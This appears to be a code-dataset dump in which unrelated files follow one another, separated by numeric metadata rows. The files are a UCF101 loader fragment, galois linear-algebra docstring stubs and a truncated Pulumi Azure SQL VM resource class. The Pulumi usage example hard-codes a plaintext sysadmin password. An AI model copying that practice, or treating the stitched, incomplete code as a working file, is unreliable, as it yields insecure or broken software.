assert opt.dataset in [
'ucf101',
]
if opt.dataset == 'ucf101':
validation_data = UCF101(
opt.video_path,
opt.annotation_path,
'validation',
opt.n_val_samples,
common_temporal_transform=common_temporal_transform,
common_spatial_transform=common_spatial_transform,
target_spatial_transform=target_spatial_transform,
input_spatial_transform=input_spatial_transform,
target_label_transform=target_label_transform,
sample_duration=opt.sample_duration)
return validation_data
def get_test_set(opt,
common_temporal_transform,
common_spatial_transform,
target_spatial_transform,
input_spatial_transform,
target_label_transform
):
assert opt.dataset in [
'ucf101',
]
assert opt.test_subset in ['val', 'test']
if opt.test_subset == 'val':
subset = 'validation'
elif opt.test_subset == 'test':
subset = 'testing'
if opt.dataset == 'ucf101':
test_data = UCF101(
opt.video_path,
opt.annotation_path,
subset,
10,
common_temporal_transform=common_temporal_transform,
common_spatial_transform=common_spatial_transform,
target_spatial_transform=target_spatial_transform,
input_spatial_transform=input_spatial_transform,
target_label_transform=target_label_transform,
sample_duration=opt.sample_duration)
return test_data
| 33.22093
| 64
| 0.60658
| 263
| 2,857
| 6.13308
| 0.140684
| 0.267824
| 0.204588
| 0.16181
| 0.822071
| 0.822071
| 0.822071
| 0.822071
| 0.749535
| 0.749535
| 0
| 0.018548
| 0.339517
| 2,857
| 85
| 65
| 33.611765
| 0.836248
| 0
| 0
| 0.689189
| 0
| 0
| 0.029751
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 1
| 0.040541
| false
| 0
| 0.013514
| 0
| 0.094595
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1ecc7d1c94a99e1b6614a3c6414a05ececa7eb38
| 3,203
|
py
|
Python
|
np/linalg.py
|
BK-Modding/galois
|
5da4db84d90083e337ebe2c1838df5c6db88fd3f
|
[
"MIT"
] | null | null | null |
np/linalg.py
|
BK-Modding/galois
|
5da4db84d90083e337ebe2c1838df5c6db88fd3f
|
[
"MIT"
] | null | null | null |
np/linalg.py
|
BK-Modding/galois
|
5da4db84d90083e337ebe2c1838df5c6db88fd3f
|
[
"MIT"
] | null | null | null |
def matrix_rank(x):
"""
Returns the rank of a Galois field matrix.
References
----------
* https://numpy.org/doc/stable/reference/generated/numpy.linalg.matrix_rank.html
Examples
--------
.. ipython:: python
GF = galois.GF(31)
A = GF.Identity(4); A
np.linalg.matrix_rank(A)
One column is a linear combination of another.
.. ipython:: python
GF = galois.GF(31)
A = GF.Random((4,4)); A
A[:,2] = A[:,1] * GF(17); A
np.linalg.matrix_rank(A)
One row is a linear combination of another.
.. ipython:: python
GF = galois.GF(31)
A = GF.Random((4,4)); A
A[3,:] = A[2,:] * GF(8); A
np.linalg.matrix_rank(A)
"""
return
def matrix_power(x):
"""
Raises a square Galois field matrix to an integer power.
References
----------
* https://numpy.org/doc/stable/reference/generated/numpy.linalg.matrix_power.html
Examples
--------
.. ipython:: python
GF = galois.GF(31)
A = GF.Random((3,3)); A
np.linalg.matrix_power(A, 3)
A @ A @ A
.. ipython:: python
GF = galois.GF(31)
# Ensure A is full rank and invertible
while True:
A = GF.Random((3,3))
if np.linalg.matrix_rank(A) == 3:
break
A
np.linalg.matrix_power(A, -3)
A_inv = np.linalg.inv(A)
A_inv @ A_inv @ A_inv
"""
return
def det(A):
"""
Computes the determinant of the matrix.
References
----------
* https://numpy.org/doc/stable/reference/generated/numpy.linalg.det.html
Examples
--------
.. ipython:: python
GF = galois.GF(31)
A = GF.Random((2,2)); A
np.linalg.det(A)
A[0,0]*A[1,1] - A[0,1]*A[1,0]
"""
return
def inv(A):
"""
Computes the inverse of the matrix.
References
----------
* https://numpy.org/doc/stable/reference/generated/numpy.linalg.inv.html
Examples
--------
.. ipython:: python
GF = galois.GF(31)
# Ensure A is full rank and invertible
while True:
A = GF.Random((3,3))
if np.linalg.matrix_rank(A) == 3:
break
A
A_inv = np.linalg.inv(A); A_inv
A_inv @ A
"""
return
def solve(x):
"""
Solves the system of linear equations.
References
----------
* https://numpy.org/doc/stable/reference/generated/numpy.linalg.solve.html
Examples
--------
.. ipython:: python
GF = galois.GF(31)
# Ensure A is full rank and invertible
while True:
A = GF.Random((4,4))
if np.linalg.matrix_rank(A) == 4:
break
A
b = GF.Random(4); b
x = np.linalg.solve(A, b); x
A @ x
.. ipython:: python
GF = galois.GF(31)
# Ensure A is full rank and invertible
while True:
A = GF.Random((4,4))
if np.linalg.matrix_rank(A) == 4:
break
A
B = GF.Random((4,2)); B
X = np.linalg.solve(A, B); X
A @ X
"""
return
| 20.934641
| 85
| 0.499844
| 428
| 3,203
| 3.693925
| 0.156542
| 0.070841
| 0.085389
| 0.119545
| 0.802657
| 0.801392
| 0.788741
| 0.759646
| 0.731815
| 0.731815
| 0
| 0.028176
| 0.346238
| 3,203
| 152
| 86
| 21.072368
| 0.726839
| 0.806744
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 10
|
94d9ac9bc28ad31229ba01fc7419406888fe9d62
| 38,013
|
py
|
Python
|
sdk/python/pulumi_azure/mssql/virtual_machine.py
|
ScriptBox99/pulumi-azure
|
1b8c6d5479ccabc39094741eac25a8ca44c8833a
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/mssql/virtual_machine.py
|
ScriptBox99/pulumi-azure
|
1b8c6d5479ccabc39094741eac25a8ca44c8833a
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/mssql/virtual_machine.py
|
ScriptBox99/pulumi-azure
|
1b8c6d5479ccabc39094741eac25a8ca44c8833a
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['VirtualMachineArgs', 'VirtualMachine']
@pulumi.input_type
class VirtualMachineArgs:
def __init__(__self__, *,
sql_license_type: pulumi.Input[str],
virtual_machine_id: pulumi.Input[str],
auto_backup: Optional[pulumi.Input['VirtualMachineAutoBackupArgs']] = None,
auto_patching: Optional[pulumi.Input['VirtualMachineAutoPatchingArgs']] = None,
key_vault_credential: Optional[pulumi.Input['VirtualMachineKeyVaultCredentialArgs']] = None,
r_services_enabled: Optional[pulumi.Input[bool]] = None,
sql_connectivity_port: Optional[pulumi.Input[int]] = None,
sql_connectivity_type: Optional[pulumi.Input[str]] = None,
sql_connectivity_update_password: Optional[pulumi.Input[str]] = None,
sql_connectivity_update_username: Optional[pulumi.Input[str]] = None,
storage_configuration: Optional[pulumi.Input['VirtualMachineStorageConfigurationArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a VirtualMachine resource.
:param pulumi.Input[str] sql_license_type: The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_machine_id: The ID of the Virtual Machine. Changing this forces a new resource to be created.
:param pulumi.Input['VirtualMachineAutoBackupArgs'] auto_backup: An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
:param pulumi.Input['VirtualMachineAutoPatchingArgs'] auto_patching: An `auto_patching` block as defined below.
:param pulumi.Input['VirtualMachineKeyVaultCredentialArgs'] key_vault_credential: (Optional) An `key_vault_credential` block as defined below.
:param pulumi.Input[bool] r_services_enabled: Should R Services be enabled?
:param pulumi.Input[int] sql_connectivity_port: The SQL Server port. Defaults to `1433`.
:param pulumi.Input[str] sql_connectivity_type: The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
:param pulumi.Input[str] sql_connectivity_update_password: The SQL Server sysadmin login password.
:param pulumi.Input[str] sql_connectivity_update_username: The SQL Server sysadmin login to create.
:param pulumi.Input['VirtualMachineStorageConfigurationArgs'] storage_configuration: An `storage_configuration` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "sql_license_type", sql_license_type)
pulumi.set(__self__, "virtual_machine_id", virtual_machine_id)
if auto_backup is not None:
pulumi.set(__self__, "auto_backup", auto_backup)
if auto_patching is not None:
pulumi.set(__self__, "auto_patching", auto_patching)
if key_vault_credential is not None:
pulumi.set(__self__, "key_vault_credential", key_vault_credential)
if r_services_enabled is not None:
pulumi.set(__self__, "r_services_enabled", r_services_enabled)
if sql_connectivity_port is not None:
pulumi.set(__self__, "sql_connectivity_port", sql_connectivity_port)
if sql_connectivity_type is not None:
pulumi.set(__self__, "sql_connectivity_type", sql_connectivity_type)
if sql_connectivity_update_password is not None:
pulumi.set(__self__, "sql_connectivity_update_password", sql_connectivity_update_password)
if sql_connectivity_update_username is not None:
pulumi.set(__self__, "sql_connectivity_update_username", sql_connectivity_update_username)
if storage_configuration is not None:
pulumi.set(__self__, "storage_configuration", storage_configuration)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="sqlLicenseType")
def sql_license_type(self) -> pulumi.Input[str]:
"""
The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "sql_license_type")
@sql_license_type.setter
def sql_license_type(self, value: pulumi.Input[str]):
pulumi.set(self, "sql_license_type", value)
@property
@pulumi.getter(name="virtualMachineId")
def virtual_machine_id(self) -> pulumi.Input[str]:
"""
The ID of the Virtual Machine. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_machine_id")
@virtual_machine_id.setter
def virtual_machine_id(self, value: pulumi.Input[str]):
pulumi.set(self, "virtual_machine_id", value)
@property
@pulumi.getter(name="autoBackup")
def auto_backup(self) -> Optional[pulumi.Input['VirtualMachineAutoBackupArgs']]:
"""
An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
"""
return pulumi.get(self, "auto_backup")
@auto_backup.setter
def auto_backup(self, value: Optional[pulumi.Input['VirtualMachineAutoBackupArgs']]):
pulumi.set(self, "auto_backup", value)
@property
@pulumi.getter(name="autoPatching")
def auto_patching(self) -> Optional[pulumi.Input['VirtualMachineAutoPatchingArgs']]:
"""
An `auto_patching` block as defined below.
"""
return pulumi.get(self, "auto_patching")
@auto_patching.setter
def auto_patching(self, value: Optional[pulumi.Input['VirtualMachineAutoPatchingArgs']]):
pulumi.set(self, "auto_patching", value)
@property
@pulumi.getter(name="keyVaultCredential")
def key_vault_credential(self) -> Optional[pulumi.Input['VirtualMachineKeyVaultCredentialArgs']]:
"""
(Optional) An `key_vault_credential` block as defined below.
"""
return pulumi.get(self, "key_vault_credential")
@key_vault_credential.setter
def key_vault_credential(self, value: Optional[pulumi.Input['VirtualMachineKeyVaultCredentialArgs']]):
pulumi.set(self, "key_vault_credential", value)
@property
@pulumi.getter(name="rServicesEnabled")
def r_services_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Should R Services be enabled?
"""
return pulumi.get(self, "r_services_enabled")
@r_services_enabled.setter
def r_services_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "r_services_enabled", value)
@property
@pulumi.getter(name="sqlConnectivityPort")
def sql_connectivity_port(self) -> Optional[pulumi.Input[int]]:
"""
The SQL Server port. Defaults to `1433`.
"""
return pulumi.get(self, "sql_connectivity_port")
@sql_connectivity_port.setter
def sql_connectivity_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "sql_connectivity_port", value)
@property
@pulumi.getter(name="sqlConnectivityType")
def sql_connectivity_type(self) -> Optional[pulumi.Input[str]]:
"""
The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
"""
return pulumi.get(self, "sql_connectivity_type")
@sql_connectivity_type.setter
def sql_connectivity_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_connectivity_type", value)
@property
@pulumi.getter(name="sqlConnectivityUpdatePassword")
def sql_connectivity_update_password(self) -> Optional[pulumi.Input[str]]:
"""
The SQL Server sysadmin login password.
"""
return pulumi.get(self, "sql_connectivity_update_password")
@sql_connectivity_update_password.setter
def sql_connectivity_update_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_connectivity_update_password", value)
@property
@pulumi.getter(name="sqlConnectivityUpdateUsername")
def sql_connectivity_update_username(self) -> Optional[pulumi.Input[str]]:
"""
The SQL Server sysadmin login to create.
"""
return pulumi.get(self, "sql_connectivity_update_username")
@sql_connectivity_update_username.setter
def sql_connectivity_update_username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_connectivity_update_username", value)
@property
@pulumi.getter(name="storageConfiguration")
def storage_configuration(self) -> Optional[pulumi.Input['VirtualMachineStorageConfigurationArgs']]:
"""
An `storage_configuration` block as defined below.
"""
return pulumi.get(self, "storage_configuration")
@storage_configuration.setter
def storage_configuration(self, value: Optional[pulumi.Input['VirtualMachineStorageConfigurationArgs']]):
pulumi.set(self, "storage_configuration", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _VirtualMachineState:
def __init__(__self__, *,
auto_backup: Optional[pulumi.Input['VirtualMachineAutoBackupArgs']] = None,
auto_patching: Optional[pulumi.Input['VirtualMachineAutoPatchingArgs']] = None,
key_vault_credential: Optional[pulumi.Input['VirtualMachineKeyVaultCredentialArgs']] = None,
r_services_enabled: Optional[pulumi.Input[bool]] = None,
sql_connectivity_port: Optional[pulumi.Input[int]] = None,
sql_connectivity_type: Optional[pulumi.Input[str]] = None,
sql_connectivity_update_password: Optional[pulumi.Input[str]] = None,
sql_connectivity_update_username: Optional[pulumi.Input[str]] = None,
sql_license_type: Optional[pulumi.Input[str]] = None,
storage_configuration: Optional[pulumi.Input['VirtualMachineStorageConfigurationArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_machine_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering VirtualMachine resources.
:param pulumi.Input['VirtualMachineAutoBackupArgs'] auto_backup: An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
:param pulumi.Input['VirtualMachineAutoPatchingArgs'] auto_patching: An `auto_patching` block as defined below.
:param pulumi.Input['VirtualMachineKeyVaultCredentialArgs'] key_vault_credential: (Optional) An `key_vault_credential` block as defined below.
:param pulumi.Input[bool] r_services_enabled: Should R Services be enabled?
:param pulumi.Input[int] sql_connectivity_port: The SQL Server port. Defaults to `1433`.
:param pulumi.Input[str] sql_connectivity_type: The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
:param pulumi.Input[str] sql_connectivity_update_password: The SQL Server sysadmin login password.
:param pulumi.Input[str] sql_connectivity_update_username: The SQL Server sysadmin login to create.
:param pulumi.Input[str] sql_license_type: The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
:param pulumi.Input['VirtualMachineStorageConfigurationArgs'] storage_configuration: An `storage_configuration` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] virtual_machine_id: The ID of the Virtual Machine. Changing this forces a new resource to be created.
"""
if auto_backup is not None:
pulumi.set(__self__, "auto_backup", auto_backup)
if auto_patching is not None:
pulumi.set(__self__, "auto_patching", auto_patching)
if key_vault_credential is not None:
pulumi.set(__self__, "key_vault_credential", key_vault_credential)
if r_services_enabled is not None:
pulumi.set(__self__, "r_services_enabled", r_services_enabled)
if sql_connectivity_port is not None:
pulumi.set(__self__, "sql_connectivity_port", sql_connectivity_port)
if sql_connectivity_type is not None:
pulumi.set(__self__, "sql_connectivity_type", sql_connectivity_type)
if sql_connectivity_update_password is not None:
pulumi.set(__self__, "sql_connectivity_update_password", sql_connectivity_update_password)
if sql_connectivity_update_username is not None:
pulumi.set(__self__, "sql_connectivity_update_username", sql_connectivity_update_username)
if sql_license_type is not None:
pulumi.set(__self__, "sql_license_type", sql_license_type)
if storage_configuration is not None:
pulumi.set(__self__, "storage_configuration", storage_configuration)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if virtual_machine_id is not None:
pulumi.set(__self__, "virtual_machine_id", virtual_machine_id)
@property
@pulumi.getter(name="autoBackup")
def auto_backup(self) -> Optional[pulumi.Input['VirtualMachineAutoBackupArgs']]:
"""
An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
"""
return pulumi.get(self, "auto_backup")
@auto_backup.setter
def auto_backup(self, value: Optional[pulumi.Input['VirtualMachineAutoBackupArgs']]):
pulumi.set(self, "auto_backup", value)
@property
@pulumi.getter(name="autoPatching")
def auto_patching(self) -> Optional[pulumi.Input['VirtualMachineAutoPatchingArgs']]:
"""
An `auto_patching` block as defined below.
"""
return pulumi.get(self, "auto_patching")
@auto_patching.setter
def auto_patching(self, value: Optional[pulumi.Input['VirtualMachineAutoPatchingArgs']]):
pulumi.set(self, "auto_patching", value)
@property
@pulumi.getter(name="keyVaultCredential")
def key_vault_credential(self) -> Optional[pulumi.Input['VirtualMachineKeyVaultCredentialArgs']]:
"""
(Optional) An `key_vault_credential` block as defined below.
"""
return pulumi.get(self, "key_vault_credential")
@key_vault_credential.setter
def key_vault_credential(self, value: Optional[pulumi.Input['VirtualMachineKeyVaultCredentialArgs']]):
pulumi.set(self, "key_vault_credential", value)
@property
@pulumi.getter(name="rServicesEnabled")
def r_services_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Should R Services be enabled?
"""
return pulumi.get(self, "r_services_enabled")
@r_services_enabled.setter
def r_services_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "r_services_enabled", value)
@property
@pulumi.getter(name="sqlConnectivityPort")
def sql_connectivity_port(self) -> Optional[pulumi.Input[int]]:
"""
The SQL Server port. Defaults to `1433`.
"""
return pulumi.get(self, "sql_connectivity_port")
@sql_connectivity_port.setter
def sql_connectivity_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "sql_connectivity_port", value)
@property
@pulumi.getter(name="sqlConnectivityType")
def sql_connectivity_type(self) -> Optional[pulumi.Input[str]]:
"""
The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
"""
return pulumi.get(self, "sql_connectivity_type")
@sql_connectivity_type.setter
def sql_connectivity_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_connectivity_type", value)
@property
@pulumi.getter(name="sqlConnectivityUpdatePassword")
def sql_connectivity_update_password(self) -> Optional[pulumi.Input[str]]:
"""
The SQL Server sysadmin login password.
"""
return pulumi.get(self, "sql_connectivity_update_password")
@sql_connectivity_update_password.setter
def sql_connectivity_update_password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_connectivity_update_password", value)
@property
@pulumi.getter(name="sqlConnectivityUpdateUsername")
def sql_connectivity_update_username(self) -> Optional[pulumi.Input[str]]:
"""
The SQL Server sysadmin login to create.
"""
return pulumi.get(self, "sql_connectivity_update_username")
@sql_connectivity_update_username.setter
def sql_connectivity_update_username(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_connectivity_update_username", value)
@property
@pulumi.getter(name="sqlLicenseType")
def sql_license_type(self) -> Optional[pulumi.Input[str]]:
"""
The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "sql_license_type")
@sql_license_type.setter
def sql_license_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sql_license_type", value)
@property
@pulumi.getter(name="storageConfiguration")
def storage_configuration(self) -> Optional[pulumi.Input['VirtualMachineStorageConfigurationArgs']]:
"""
An `storage_configuration` block as defined below.
"""
return pulumi.get(self, "storage_configuration")
@storage_configuration.setter
def storage_configuration(self, value: Optional[pulumi.Input['VirtualMachineStorageConfigurationArgs']]):
pulumi.set(self, "storage_configuration", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="virtualMachineId")
def virtual_machine_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Machine. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_machine_id")
@virtual_machine_id.setter
def virtual_machine_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_machine_id", value)
class VirtualMachine(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_backup: Optional[pulumi.Input[pulumi.InputType['VirtualMachineAutoBackupArgs']]] = None,
auto_patching: Optional[pulumi.Input[pulumi.InputType['VirtualMachineAutoPatchingArgs']]] = None,
key_vault_credential: Optional[pulumi.Input[pulumi.InputType['VirtualMachineKeyVaultCredentialArgs']]] = None,
r_services_enabled: Optional[pulumi.Input[bool]] = None,
sql_connectivity_port: Optional[pulumi.Input[int]] = None,
sql_connectivity_type: Optional[pulumi.Input[str]] = None,
sql_connectivity_update_password: Optional[pulumi.Input[str]] = None,
sql_connectivity_update_username: Optional[pulumi.Input[str]] = None,
sql_license_type: Optional[pulumi.Input[str]] = None,
storage_configuration: Optional[pulumi.Input[pulumi.InputType['VirtualMachineStorageConfigurationArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_machine_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Microsoft SQL Virtual Machine
## Example Usage
This example provisions a brief Managed MsSql Virtual Machine.
```python
import pulumi
import pulumi_azure as azure
example_virtual_machine = azure.compute.get_virtual_machine(name="example-vm",
resource_group_name="example-resources")
example_mssql_virtual_machine_virtual_machine = azure.mssql.VirtualMachine("exampleMssql/virtualMachineVirtualMachine",
virtual_machine_id=example_virtual_machine.id,
sql_license_type="PAYG",
r_services_enabled=True,
sql_connectivity_port=1433,
sql_connectivity_type="PRIVATE",
sql_connectivity_update_password="Password1234!",
sql_connectivity_update_username="sqllogin",
auto_patching=azure.mssql.VirtualMachineAutoPatchingArgs(
day_of_week="Sunday",
maintenance_window_duration_in_minutes=60,
maintenance_window_starting_hour=2,
))
```
## Import
Sql Virtual Machines can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:mssql/virtualMachine:VirtualMachine example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.SqlVirtualMachine/sqlVirtualMachines/example1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['VirtualMachineAutoBackupArgs']] auto_backup: An `auto_backup` block as defined below. This block can be added to an existing resource, but removing this block forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['VirtualMachineAutoPatchingArgs']] auto_patching: An `auto_patching` block as defined below.
:param pulumi.Input[pulumi.InputType['VirtualMachineKeyVaultCredentialArgs']] key_vault_credential: (Optional) An `key_vault_credential` block as defined below.
:param pulumi.Input[bool] r_services_enabled: Should R Services be enabled?
:param pulumi.Input[int] sql_connectivity_port: The SQL Server port. Defaults to `1433`.
:param pulumi.Input[str] sql_connectivity_type: The connectivity type used for this SQL Server. Defaults to `PRIVATE`.
:param pulumi.Input[str] sql_connectivity_update_password: The SQL Server sysadmin login password.
:param pulumi.Input[str] sql_connectivity_update_username: The SQL Server sysadmin login to create.
:param pulumi.Input[str] sql_license_type: The SQL Server license type. Possible values are `AHUB` (Azure Hybrid Benefit) and `PAYG` (Pay-As-You-Go). Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['VirtualMachineStorageConfigurationArgs']] storage_configuration: An `storage_configuration` block as defined below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] virtual_machine_id: The ID of the Virtual Machine. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VirtualMachineArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Microsoft SQL Virtual Machine
## Example Usage
This example provisions a brief Managed MsSql Virtual Machine.
```python
import pulumi
import pulumi_azure as azure
example_virtual_machine = azure.compute.get_virtual_machine(name="example-vm",
resource_group_name="example-resources")
example_mssql_virtual_machine_virtual_machine = azure.mssql.VirtualMachine("exampleMssql/virtualMachineVirtualMachine",
virtual_machine_id=example_virtual_machine.id,
sql_license_type="PAYG",
r_services_enabled=True,
sql_connectivity_port=1433,
sql_connectivity_type="PRIVATE",
sql_connectivity_update_password="Password1234!",
sql_connectivity_update_username="sqllogin",
auto_patching=azure.mssql.VirtualMachineAutoPatchingArgs(
day_of_week="Sunday",
maintenance_window_duration_in_minutes=60,
maintenance_window_starting_hour=2,
))
```
## Import
Sql Virtual Machines can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:mssql/virtualMachine:VirtualMachine example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.SqlVirtualMachine/sqlVirtualMachines/example1
```
:param str resource_name: The name of the resource.
:param VirtualMachineArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VirtualMachineArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_backup: Optional[pulumi.Input[pulumi.InputType['VirtualMachineAutoBackupArgs']]] = None,
auto_patching: Optional[pulumi.Input[pulumi.InputType['VirtualMachineAutoPatchingArgs']]] = None,
key_vault_credential: Optional[pulumi.Input[pulumi.InputType['VirtualMachineKeyVaultCredentialArgs']]] = None,
r_services_enabled: Optional[pulumi.Input[bool]] = None,
sql_connectivity_port: Optional[pulumi.Input[int]] = None,
sql_connectivity_type: Optional[pulumi.Input[str]] = None,
sql_connectivity_update_password: Optional[pulumi.Input[str]] = None,
sql_connectivity_update_username: Optional[pulumi.Input[str]] = None,
sql_license_type: Optional[pulumi.Input[str]] = None,
storage_configuration: Optional[pulumi.Input[pulumi.InputType['VirtualMachineStorageConfigurationArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_machine_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VirtualMachineArgs.__new__(VirtualMachineArgs)
__props__.__dict__["auto_backup"] = auto_backup
__props__.__dict__["auto_patching"] = auto_patching
__props__.__dict__["key_vault_credential"] = key_vault_credential
__props__.__dict__["r_services_enabled"] = r_services_enabled
__props__.__dict__["sql_connectivity_port"] = sql_connectivity_port
__props__.__dict__["sql_connectivity_type"] = sql_connectivity_type
__props__.__dict__["sql_connectivity_update_password"] = sql_connectivity_update_password
__props__.__dict__["sql_connectivity_update_username"] = sql_connectivity_update_username
if sql_license_type is None and not opts.urn:
raise TypeError("Missing required property 'sql_license_type'")
__props__.__dict__["sql_license_type"] = sql_license_type
__props__.__dict__["storage_configuration"] = storage_configuration
__props__.__dict__["tags"] = tags
if virtual_machine_id is None and not opts.urn:
raise TypeError("Missing required property 'virtual_machine_id'")
__props__.__dict__["virtual_machine_id"] = virtual_machine_id
super(VirtualMachine, __self__).__init__(
'azure:mssql/virtualMachine:VirtualMachine',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
auto_backup: Optional[pulumi.Input[pulumi.InputType['VirtualMachineAutoBackupArgs']]] = None,
auto_patching: Optional[pulumi.Input[pulumi.InputType['VirtualMachineAutoPatchingArgs']]] = None,
key_vault_credential: Optional[pulumi.Input[pulumi.InputType['VirtualMachineKeyVaultCredentialArgs']]] = None,
r_services_enabled: Optional[pulumi.Input[bool]] = None,
sql_connectivity_port: Optional[pulumi.Input[int]] = None,
